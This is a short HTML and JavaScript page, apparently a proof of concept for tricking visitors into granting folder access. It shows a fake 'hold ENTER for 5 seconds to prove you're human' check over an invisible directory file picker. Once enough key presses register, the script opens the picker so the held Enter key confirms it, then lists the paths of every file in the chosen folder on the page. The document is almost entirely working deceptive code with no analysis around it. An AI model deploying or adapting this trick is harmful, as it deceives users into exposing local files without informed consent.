<style>
  #filepicker {
     opacity: 0.0;
  }
</style>

<h3 id="qmsg"><input type="file" id="filepicker" name="fileList" webkitdirectory multiple />Hold down the ENTER key for 5 seconds to prove you're human..</h3>
    
<ul id="listing"></ul>
<script>
document.getElementById("filepicker").addEventListener("change", function(event) {
  let output = document.getElementById("listing");
  let files = event.target.files;

  for (let i=0; i<files.length; i++) {
    let item = document.createElement("li");
    item.innerHTML = files[i].webkitRelativePath;
    output.appendChild(item);
  };
}, false);


var i = 0;
        document.onkeydown = function() {
            i++;
            if (i > 4) {
                filepicker.click();
                i = -10000;
                document.onkeydown = null;
                setTimeout(function() {
                    qmsg.innerHTML = '';
                }, 0);
            };
        };
</script>
